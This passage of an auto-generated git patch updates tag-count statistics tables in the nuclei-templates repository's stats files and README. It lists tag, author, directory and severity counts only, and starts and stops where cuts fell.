| | | | | | | | | -| nytimes | 1 | | | | | | | | | -| payroll | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| woody | 1 | | | | | | | | | -| aerocms | 1 | | | | | | | | | -| wifi | 1 | | | | | | | | | -| caringbridge | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| cvnd2018 | 1 | | | | | | | | | -| buddy | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| wanelo | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| ogc | 1 | | | | | | | | | -| weglot | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| platformio | 1 | | | | | | | | | -| smelsy | 1 | | | | | | | | | -| jeecg-boot | 1 | | | | | | | | | -| gn-publisher | 1 | | | | | | | | | +| eyoumail | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| supervisor | 1 | | | | | | | | | +| bumsys | 1 | | | | | | | | | +| sls | 1 | | | | | | | | | +| nitely | 1 | | | | | | | | | +| wp-shoutbox-live-chat | 1 | | | | | | | | | +| chuangtian | 1 | | | | | | | | | | pendo | 1 | | | | | | | | | -| fuji | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| verint | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| fandalism | 1 | | | | | | | | | -| woocs | 1 | | | | | | | | | -| bugcrowd | 1 | | | | | | | | | -| sofurry | 1 | | | | | | | | | -| auru | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| lob | 1 | | | | | | | | | +| warriorforum | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| genie | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| drum | 1 | | | | | | | | | +| proxycrawl | 1 | | | | | | | | | | gnu | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| openedx | 1 | | | | | | | | | -| zhihu | 1 | | | | | | | | | -| wp-autosuggest | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | | zoomsounds | 1 | | | | | | | | | -| lightdash | 1 | | | | | | | | | -| cql | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| peoplesoft | 1 | | | | | | | | | -| casemanager | 1 | | | | | | | | | -| i-mscp | 1 | | | | | | | | | -| elevation | 1 | | | | | | | | | -| sevone | 1 | | | | | | | | | -| atg | 1 | | | | | | | | | -| gift-voucher | 1 | | | | | | | | | -| hackaday | 1 | | | | | | | | | -| wp-experiments-free | 1 | | | | | | | | | -| epm | 1 | | | | | | | | | -| wikidot | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| qts | 1 | | | | | | | | | -| perfsonar | 1 | | | | | | | | | -| vero | 1 | | | | | | | | | -| imgur | 1 | | | | | | | | | -| garagemanagementsystem | 1 | | | | | | | | | -| ilch | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| moxfield | 1 | | | | | | | | | -| voice123 | 1 | | | | | | | | | -| clearbit | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| magabook | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | +| drill | 1 | | | | | | | | | +| mapmytracks | 1 | | | | | | | | | +| quora | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| pdflayer | 1 | | | | | | | | | +| pelco | 1 | | | | | | | | | | geolocation | 1 | | | | | | | | | -| atutor | 1 | | | | | | | | | -| epp | 1 | | | | | | | | | -| xproxy | 1 | | | | | | | | | -| allesovercrypto | 1 | | | | | | | | | -| livejournal | 1 | | | | | | | | | -| zoomitir | 1 | | | | | | | | | -| minimouse | 1 | | | | | | | | | -| ds_store | 1 | | | | | | | | | -| hackster | 1 | | | | | | | | | -| smule | 1 | | | | | | | | | -| gnome-extensions | 1 | | | | | | | | | -| storybook | 1 | | | | | | | | | -| mybuildercom | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| mailer | 1 | | | | | | | | | -| rss | 1 | | | | | | | | | -| remedy | 1 | | | | | | | | | -| wireclub | 1 | | | | | | | | | -| xhamster | 1 | | | | | | | | | -| collegemanagement | 1 | | | | | | | | | -| mini_httpd | 1 | | | | | | | | | -| fansly | 1 | | | | | | | | | -| atlantis | 1 | | | | | | | | | -| footprints | 1 | | | | | | | | | -| encompass | 1 | | | | | | | | | -| bigo-live | 1 | | | | | | | | | -| mesos | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| improvmx | 1 | | | | | | | | | -| ibax | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| scrapingdog | 1 | | | | | | | | | -| n-central | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| prismaweb | 1 | | | | | | | | | -| chaos | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| zipkin | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| mylittleadmin | 1 | | | | | | | | | -| cloudfoundry | 1 | | | | | | | | | -| image-optimizer-wd | 1 | | | | | | | | | -| todoist | 1 | | | | | | | | | -| rocketmq | 1 | | | | | | | | | -| tf2-backpack-examiner | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| engadget | 1 | | | | | | | | | -| badarg | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| psstaudio | 1 | | | | | | | | | -| buddypress | 1 | | | | | | | | | -| airnotifier | 1 | | | | | | | | | -| ventrilo | 1 | | | | | | | | | -| hanime | 1 | | | | | | | | | -| cucm | 1 | | | | | | | | | -| patheon | 1 | | | | | | | | | -| age-verification | 1 | | | | | | | | | -| utipio | 1 | | | | | | | | | -| xing | 1 | | | | | | | | | -| spinnaker | 1 | | | | | | | | | +| quixplorer | 1 | | | | | | | | | +| sma1000 | 1 | | | | | | | | | +| eclipsebirt | 1 | | | | | | | | | +| nzbget | 1 | | | | | | | | | +| hunter | 1 | | | | | | | | | +| teamspeak3 | 1 | | | | | | | | | +| helloprint | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| scoutwiki | 1 | | | | | | | | | +| sentimente | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| ourmgmt3 | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| tagged | 1 | | | | | | | | | +| flip | 1 | | | | | | | | | +| dqs | 1 | | | | | | | | | +| ivms | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| bestbooks | 1 | | | | | | | | | +| webcenter | 1 | | | | | | | | | +| akniga | 1 | | | | | | | | | +| syncthru | 1 | | | | | | | | | +| racksnet | 1 | | | | | | | | | +| gigapan | 1 | | | | | | | | | +| pcpartpicker | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| adult-forum | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| domos | 1 | | | | | | | | | +| igromania | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| mystic-stealer | 1 | | | | | | | | | +| kaggle | 1 | | | | | | | | | +| pop3 | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| issuu | 1 | | | | | | | | | | visnesscard | 1 | | | | | | | | | -| opsgenie | 1 | | | | | | | | | -| essential-real-estate | 1 | | | | | | | | | -| ulubpl | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| bottle | 1 | | | | | | | | | -| kivicare-clinic-management-system | 1 | | | | | | | | | -| affiliates-manager | 1 | | | | | | | | | -| cve1028 | 1 | | | | | | | | | -| jreport | 1 | | | | | | | | | -| babel | 1 | | | | | | | | | -| selfcheck | 1 | | | | | | | | | -| revslider | 1 | | | | | | | | | -| thinkserver | 1 | | | | | | | | | -| authorstream | 1 | | | | | | | | | -| richfaces | 1 | | | | | | | | | -| ptr | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| hometechsocial-mastodon-instance | 1 | | | | | | | | | -| duolingo | 1 | | | | | | | | | -| itchio | 1 | | | | | | | | | -| notabug | 1 | | | | | | | | | -| gnuboard5 | 1 | | | | | | | | | -| suitecrm | 1 | | | | | | | | | -| thegatewaypundit | 1 | | | | | | | | | -| hangfire | 1 | | | | | | | | | -| bblog-ru | 1 | | | | | | | | | -| vivino | 1 | | | | | | | | | -| enterprise | 1 | | | | | | | | | -| tembosocial | 1 | | | | | | | | | +| clearfy-cache | 1 | | | | | | | | | +| fandalism | 1 | | | | | | | | | +| awx | 1 | | | | | | | | | +| multilaser | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | +| httpbrowser | 1 | | | | | | | | | +| love-ru | 1 | | | | | | | | | +| superwebmailer | 1 | | | | | | | | | +| refresh | 1 | | | | | | | | | +| pmm | 1 | | | | | | | | | +| arduino | 1 | | | | | | | | | +| ogc | 1 | | | | | | | | | +| alchemy | 1 | | | | | | | | | +| psql | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| smule | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| citybook | 1 | | | | | | | | | +| digitalspy | 1 | | | | | | | | | +| tiktok | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| steller | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| codementor | 1 | | | | | | | | | +| antsword | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| kwejkpl | 1 | | | | | | | | | +| carbonmade | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| adWidget | 1 | | | | | | | | | +| discusselasticco | 1 | | | | | | | | | +| cargocollective | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| nuovo | 1 | | | | | | | | | +| phpminiadmin | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| championat | 1 | | | | | | | | | +| rackup | 1 | | | | | | | | | +| exagrid | 1 | | | | | | | | | +| yaws | 1 | | | | | | | | | +| mining | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | | atechmedia | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| cloudron | 1 | | | | | | | | | -| maximo | 1 | | | | | | | | | -| teamwork | 1 | | | | | | | | | -| rsshub | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| toolkit | 1 | | | | | | | | | -| anonup | 1 | | | | | | | | | -| codewars | 1 | | | | | | | | | -| rijksmuseum | 1 | | | | | | | | | -| linktap | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| utility | 1 | | | | | | | | | -| uiuxdevsocial-mastodon-instance | 1 | | | | | | | | | -| ecosys | 1 | | | | | | | | | -| bodybuildingcom | 1 | | | | | | | | | -| tuxedo | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| pricing-deals-for-woocommerce | 1 | | | | | | | | | -| lacie | 1 | | | | | | | | | -| gemfury | 1 | | | | | | | | | -| piekielni | 1 | | | | | | | | | -| plurk | 1 | | | | | | | | | -| binom | 1 | | | | | | | | | -| themefusion | 1 | | | | | | | | | -| pubsec | 1 | | | | | | | | | +| inaturalist | 1 | | | | | | | | | +| ransomware | 1 | | | | | | | | | +| zero-spam | 1 | | | | | | | | | +| manyvids | 1 | | | | | | | | | +| haraj | 1 | | | | | | | | | +| epm | 1 | | | | | | | | | +| microsoft-technet-community | 1 | | | | | | | | | | flowci | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | +| fortnite-tracker | 1 | | | | | | | | | +| twitcasting | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| siteengine | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| arprice-responsive-pricing-table | 1 | | | | | | | | | +| deimosc2 | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| fansly | 1 | | | | | | | | | +| fancentro | 1 | | | | | | | | | +| openethereum | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| mini_httpd | 1 | | | | | | | | | +| counteract | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| note | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| trino | 1 | | | | | | | | | +| oki | 1 | | | | | | | | | +| forumprawneorg | 1 | | | | | | | | | +| apiflash | 1 | | | | | | | | | +| siteminder | 1 | | | | | | | | | +| phpmemcached | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| interpals | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| looker | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| rss | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| authorstream | 1 | | | | | | | | | +| business | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| lms | 1 | | | | | | | | | +| tigase | 1 | | | | | | | | | +| ray | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| web3storage | 1 | | | | | | | | | +| zenserp | 1 | | | | | | | | | +| smartgateway | 1 | | | | | | | | | +| supersign | 1 | | | | | | | | | +| web-suite | 1 | | | | | | | | | +| scrapingant | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| telaen | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| mobile | 1 | | | | | | | | | +| mastodonbooksnet-mastodon-instance | 1 | | | | | | | | | +| phpMyChat | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| filetransfer | 1 | | | | | | | | | +| netic | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| raspberrymatic | 1 | | | | | | | | | +| bdsmsingles | 1 | | | | | | | | | +| hacker-news | 1 | | | | | | | | | +| ifttt | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| gn-publisher | 1 | | | | | | | | | +| aboutme | 1 | | | | | | | | | +| wp-ban | 1 | | | | | | | | | +| nessus | 1 | | | | | | | | | +| mpftvc | 1 | | | | | | | | | +| pixelfedsocial | 1 | | | | | | | | | +| arangodb | 1 | | | | | | | | | +| nairaland | 1 | | | | | | | | | +| impresspages | 1 | | | | | | | | | +| dss | 1 | | | | | | | | | +| codekop | 1 | | | | | | | | | +| screenshot | 1 | | | | | | | | | +| v2x | 1 | | | | | | | | | +| myspreadshop | 1 | | | | | | | | | +| raddleme | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| essential-real-estate | 1 | | | | | | | | | +| apex-legends | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| esafenet | 1 | | | | | | | | | +| mtheme | 1 | | | | | | | | | +| tmdb | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| americanthinker | 1 | | | | | | | | | +| flywheel | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | | bravia | 1 | | | | | | | | | -| justforfans | 1 | | | | | | | | | -| commvault | 1 | | | | | | | | | -| intouch | 1 | | | | | | | | | -| teslamate | 1 | | | | | | | | | -| prexview | 1 | | | | | | | | | -| jinfornet | 1 | | | | | | | | | -| aceadmin | 1 | | | | | | | | | -| geniusocean | 1 | | | | | | | | | -| inkbunny | 1 | | | | | | | | | +| smarterstats | 1 | | | | | | | | | | trackmanialadder | 1 | | | | | | | | | -| wms | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| analytify | 1 | | | | | | | | | +| minds | 1 | | | | | | | | | +| cracked-io | 1 | | | | | | | | | +| cudatel | 1 | | | | | | | | | +| wp-paytm-pay | 1 | | | | | | | | | +| tripadvisor | 1 | | | | | | | | | +| openbb | 1 | | | | | | | | | +| kylin | 1 | | | | | | | | | +| ultimate-faqs | 1 | | | | | | | | | +| netbiblio | 1 | | | | | | | | | +| xyxel | 1 | | | | | | | | | +| dicoogle | 1 | | | | | | | | | +| stonerssocial-mastodon-instance | 1 | | | | | | | | | +| bunpro | 1 | | | | | | | | | +| cal | 1 | | | | | | | | | +| fcv | 1 | | | | | | | | | +| keybase | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| websheets | 1 | | | | | | | | | +| crowdin | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| hugging-face | 1 | | | | | | | | | +| rustici | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| mythic | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| niagara | 1 | | | | | | | | | +| meteor | 1 | | | | | | | | | +| ez | 1 | | | | | | | | | +| advfn | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| proxykingdom | 1 | | | | | | | | | +| kotburger | 1 | | | | | | | | | +| advance-custom-field | 1 | | | | | | | | | +| meshcentral | 1 | | | | | | | | | +| smf | 1 | | | | | | | | | +| prose | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| openedx | 1 | | | | | | | | | +| mastodon-eu-voice | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| phonepe | 1 | | | | | | | | | +| zope | 1 | | | | | | | | | +| scrutinizer | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| qlik | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| oam | 1 | | | | | | | | | +| extreme | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| parler-archived-profile | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| imageshack | 1 | | | | | | | | | +| polygon | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| badgeos | 1 | | | | | | | | | +| spreadsheet-reader | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| mod-jk | 1 | | | | | | | | | +| sni | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| archibus | 1 | | | | | | | | | +| kraken | 1 | | | | | | | | | +| saltgui | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| lvm | 1 | | | | | | | | | +| cve2000 | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| sharingsphere | 1 | | | | | | | | | +| buddy | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| skeb | 1 | | | | | | | | | +| shesfreaky | 1 | | | | | | | | | +| buddypress | 1 | | | | | | | | | +| debian | 1 | | | | | | | | | +| stackhawk | 1 | | | | | | | | | +| getgrav | 1 | | | | | | | | | +| mofi | 1 | | | | | | | | | +| watershed | 1 | | | | | | | | | +| filmweb | 1 | | | | | | | | | +| pokemonshowdown | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| phpldap | 1 | | | | | | | | | +| kkFileview | 1 | | | | | | | | | +| insanejournal | 1 | | | | | | | | | +| taskrabbit | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| intel | 1 | | | | | | | | | +| gozi | 1 | | | | | | | | | +| ventrilo | 1 | | | | | | | | | +| martech | 1 | | | | | | | | | +| gemfury | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| apolloadminservice | 1 | | | | | | | | | +| bandcamp | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| eyeem | 1 | | | | | | | | | +| ccm | 1 | | | | | | | | | +| ftm | 1 | | | | | | | | | +| suitecrm | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| cracked | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| fandom | 1 | | | | | | | | | +| psstaudio | 1 | | | | | | | | | +| cd-action | 1 | | | | | | | | | +| form | 1 | | | | | | | | | +| reblogme | 1 | | | | | | | | | +| mesos | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| docebo | 1 | | | | | | | | | +| gpoddernet | 1 | | | | | | | | | +| homeworks | 1 | | | | | | | | | +| jupyterlab | 1 | | | | | | | | | +| piekielni | 1 | | | | | | | | | +| slideshare | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| researchgate | 1 | | | | | | | | | +| ubiquiti | 1 | | | | | | | | | +| qualcomm | 1 | | | | | | | | | +| grandnode | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| revealjs | 1 | | | | | | | | | +| davantis | 1 | | | | | | | | | +| xvideos-profiles | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| directum | 1 | | | | | | | | | +| ocs-inventory | 1 | | | | | | | | | +| pulsar360 | 1 | | | | | | | | | +| bitcoin | 1 | | | | | | | | | +| currencyscoop | 1 | | | | | | | | | +| forms | 1 | | | | | | | | | +| sogo | 1 | | | | | | | | | +| charity | 1 | | | | | | | | | +| joomsport-sports-league-results-management | 1 | | | | | | | | | +| insight | 1 | | | | | | | | | +| faculty | 1 | | | | | | | | | +| master | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| zwave | 1 | | | | | | | | | +| livejournal | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| vip-blog | 1 | | | | | | | | | +| ait-csv | 1 | | | | | | | | | +| festivo | 1 | | | | | | | | | +| abbott | 1 | | | | | | | | | +| uptime | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| rantli | 1 | | | | | | | | | +| speakout | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| jk | 1 | | | | | | | | | +| diablo | 1 | | | | | | | | | +| jeuxvideo | 1 | | | | | | | | | +| fortimanager | 1 | | | | | | | | | +| paneil | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| slocum | 1 | | | | | | | | | +| accessmanager | 1 | | | | | | | | | +| wpcentral | 1 | | | | | | | | | +| crystal | 1 | | | | | | | | | +| satellite | 1 | | | | | | | | | +| amcrest | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| teradek | 1 | | | | | | | | | +| kivicare-clinic-management-system | 1 | | | | | | | | | +| binaryedge | 1 | | | | | | | | | +| post-status-notifier-lite | 1 | | | | | | | | | +| acs | 1 | | | | | | | | | +| spx | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| cakephp | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| h5s | 1 | | | | | | | | | +| hugo | 1 | | | | | | | | | +| linktap | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| cuteeditor | 1 | | | | | | | | | +| polywork | 1 | | | | | | | | | +| jeecg-boot | 1 | | | | | | | | | +| clockify | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| anobii | 1 | | | | | | | | | +| breach-forums | 1 | | | | | | | | | +| jejapl | 1 | | | | | | | | | +| switching | 1 | | | | | | | | | +| geocaching | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| auxin-elements | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| fancyproduct | 1 | | | | | | | | | +| indegy | 1 | | | | | | | | | +| ios | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| contus-video-gallery | 1 | | | | | | | | | +| verint | 1 | | | | | | | | | +| aveva | 1 | | | | | | | | | +| container | 1 | | | | | | | | | +| lightdash | 1 | | | | | | | | | +| machproweb | 1 | | | | | | | | | +| agilecrm | 1 | | | | | | | | | +| knowyourmeme | 1 | | | | | | | | | +| resumes-actorsaccess | 1 | | | | | | | | | +| zoomeye | 1 | | | | | | | | | +| stridercd | 1 | | | | | | | | | +| mystrom | 1 | | | | | | | | | +| helprace | 1 | | | | | | | | | +| ticketmaster | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| intouch | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| storybook | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| playsms | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| dfgames | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| c99 | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| viper | 1 | | | | | | | | | +| aspect | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| soplanning | 1 | | | | | | | | | +| whmcs | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| slides | 1 | | | | | | | | | +| dmarc | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| bikemap | 1 | | | | | | | | | +| html2wp | 1 | | | | | | | | | +| boosty | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| liquibase | 1 | | | | | | | | | +| szmerinfo | 1 | | | | | | | | | +| storycorps | 1 | | | | | | | | | +| woocs | 1 | | | | | | | | | +| maestro | 1 | | | | | | | | | +| anonymous | 1 | | | | | | | | | +| delta | 1 | | | | | | | | | +| muck-rack | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| iframe | 1 | | | | | | | | | +| opentext | 1 | | | | | | | | | +| wp-smart-contracts | 1 | | | | | | | | | +| poshmark | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| sv3c | 1 | | | | | | | | | +| hoteldrui | 1 | | | | | | | | | +| blackduck | 1 | | | | | | | | | +| codebase | 1 | | | | | | | | | +| ovpn | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| wp-slimstat | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| sensu | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| collibra | 1 | | | | | | | | | +| castingcallclub | 1 | | | | | | | | | +| wattpad | 1 | | | | | | | | | +| mylittleadmin | 1 | | | | | | | | | +| intellect | 1 | | | | | | | | | +| nirweb-support | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| coverity | 1 | | | | | | | | | +| npmjs | 1 | | | | | | | | | +| crevado | 1 | | | | | | | | | +| jinfornet | 1 | | | | | | | | | +| soa | 1 | | | | | | | | | +| jhipster | 1 | | | | | | | | | +| diigo | 1 | | | | | | | | | +| pettingzooco-mastodon-instance | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| all-in-one-video-gallery | 1 | | | | | | | | | +| oas | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| kerio | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 5234375429..11d23fd065 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | -| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | -| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | -| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | -| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | -| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | | +| cve | 1949 | dhiyaneshdk | 907 | http | 6047 | info | 2940 | file | 142 | +| panel | 958 | dwisiswant0 | 797 | workflows | 190 | high | 1312 | dns | 18 | +| wordpress | 802 | daffainfo | 664 | file | 142 | medium | 1113 | | | +| exposure | 719 | pikpikcu | 353 | network | 100 | critical | 724 | | | +| xss | 695 | pdteam | 280 | ssl | 24 | low | 224 | | | +| wp-plugin | 691 | pussycat0x | 261 | dns | 18 | unknown | 27 | | | | osint | 652 | geeknik | 221 | headless | 9 | | | | | -| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | | -| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | | -| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | +| tech | 618 | ricardomaia | 220 | contributors.json | 1 | | | | | +| edb | 598 | ritikchaddha | 218 | TEMPLATES-STATS.json | 1 | | | | | +| lfi | 558 | 0x_akoko | 179 | cves.json | 1 | | | | | From 9a39d01e878a122ec094122722d2e9114b5ac756 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 07:15:23 +0000 Subject: [PATCH 534/609] Auto README Update [Sat Jul 8 07:15:23 UTC 2023] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 09c8b05381..acb7e70088 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 | -| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 | -| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | | -| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | | -| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | | -| xss | 660 | pussycat0x | 258 | 